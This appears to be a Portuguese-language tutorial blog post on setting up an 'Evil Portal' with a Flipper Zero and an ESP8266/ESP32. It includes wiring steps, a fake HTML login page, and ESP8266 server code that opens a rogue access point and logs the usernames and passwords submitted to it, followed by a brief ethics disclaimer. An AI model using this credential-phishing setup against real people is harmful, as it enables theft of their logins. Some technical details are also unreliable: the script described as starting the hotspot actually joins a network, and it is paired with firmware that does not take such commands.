O Flipper Zero é uma ferramenta poderosa e versátil, amplamente utilizada por entusiastas de hacking e profissionais de segurança. Uma das aplicações mais interessantes do Flipper Zero é a criação de um Evil Portal, que pode ser usado para capturar credenciais e realizar testes de penetração em redes Wi-Fi. Neste artigo, vamos explorar como configurar e utilizar um Evil Portal com o Flipper Zero, detalhando todas as etapas necessárias e oferecendo dicas importantes para maximizar a eficácia deste método.
O Que é um Evil Portal?
Um Evil Portal é uma página web falsa que imita uma página de login legítima, utilizada para enganar usuários a fornecer suas credenciais. Este tipo de ataque é frequentemente utilizado em testes de penetração para identificar vulnerabilidades de segurança e aumentar a conscientização sobre a importância de práticas seguras de navegação na web.
Preparando o Flipper Zero para o Evil Portal
Materiais Necessários
- Flipper Zero
- Placa Wi-Fi ESP8266 ou ESP32 (para criar o hotspot e hospedar o portal)
- Cabo de Conexão GPIO
- Cartão microSD (para armazenar arquivos e logs)
- Computador (para configuração e transferência de arquivos)
Passo a Passo para Configurar o Evil Portal
1. Conectando a Placa Wi-Fi ao Flipper Zero
- Conexão Física:
- Conecte os pinos do ESP8266/ESP32 aos pinos GPIO do Flipper Zero conforme a tabela abaixo:
- VCC do ESP ao 3.3V do Flipper Zero.
- GND do ESP ao GND do Flipper Zero.
- TX do ESP ao RX do Flipper Zero (UART).
- RX do ESP ao TX do Flipper Zero (UART).
- Verificar Conexões:
- Certifique-se de que todas as conexões estão firmes e corretas.
2. Configurando o ESP8266/ESP32
- Instalar Firmware Específico:
- Utilize um firmware como o ESP8266 Deauther que permite a criação de hotspots e a configuração de páginas web.
- Configurar o Hotspot:
- Acesse a interface de configuração do ESP e configure um novo SSID (nome da rede) para o hotspot.
- Configure a página inicial do hotspot para redirecionar para o portal falso.
- Carregar a Página do Evil Portal:
- Crie uma página HTML simples que imita a página de login do alvo desejado.
- Carregue essa página HTML no ESP para ser exibida quando um usuário se conectar ao hotspot.
3. Integrando com o Flipper Zero
- Configurar Comunicação Serial:
- Utilize scripts em mJS no Flipper Zero para se comunicar com o ESP via UART. Exemplo de script para iniciar o hotspot:
let serial = require("serial"); serial.setup("uart1", 115200); serial.write("AT+CWJAP=\"SSID\",\"PASSWORD\"\r\n"); let response = serial.read(100, 5000); console.log(response);
- Monitorar Atividades:
- Configure o Flipper Zero para monitorar a atividade do portal e registrar tentativas de login e credenciais capturadas no cartão microSD.
Exemplo de Código para Captura de Credenciais
Aqui está um exemplo simples de como capturar credenciais de um Evil Portal:
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
</head>
<body>
<h2>Login</h2>
<form action="/login" method="POST">
<label for="username">Username:</label>
<input type="text" id="username" name="username"><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password"><br><br>
<input type="submit" value="Login">
</form>
</body>
</html>E o código servidor no ESP para capturar os dados:
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
ESP8266WebServer server(80);
void setup() {
Serial.begin(115200);
WiFi.softAP("EvilPortal", "12345678");
server.on("/", []() {
server.send(200, "text/html", "<html>...</html>");
});
server.on("/login", HTTP_POST, []() {
String username = server.arg("username");
String password = server.arg("password");
Serial.println("Captured: " + username + " " + password);
server.send(200, "text/html", "<html>Login successful</html>");
});
server.begin();
}
void loop() {
server.handleClient();
}Considerações de Segurança e Ética
- Uso Responsável: Utilize a configuração de Evil Portal apenas em ambientes controlados e com permissão explícita. O uso indevido pode resultar em sérias consequências legais.
- Educação e Conscientização: Utilize o Evil Portal para educar e conscientizar sobre a importância de práticas seguras de navegação na web e autenticação.
- Segurança Pessoal: Sempre realize testes em um ambiente seguro e controlado para evitar interferências não intencionais e proteger a privacidade e segurança dos usuários.
Conclusão
O Flipper Zero, combinado com uma placa Wi-Fi ESP8266 ou ESP32, pode ser transformado em uma poderosa ferramenta para criar Evil Portals. Este guia mostrou como configurar e utilizar um Evil Portal para testes de penetração e conscientização sobre segurança. Lembre-se de sempre agir dentro da lei e manter altos padrões éticos em todas as suas atividades de segurança.
Para aprender mais sobre como usar o Flipper Zero do básico ao avançado, ou para comprar acessórios personalizados, entre na nossa comunidade no telegram.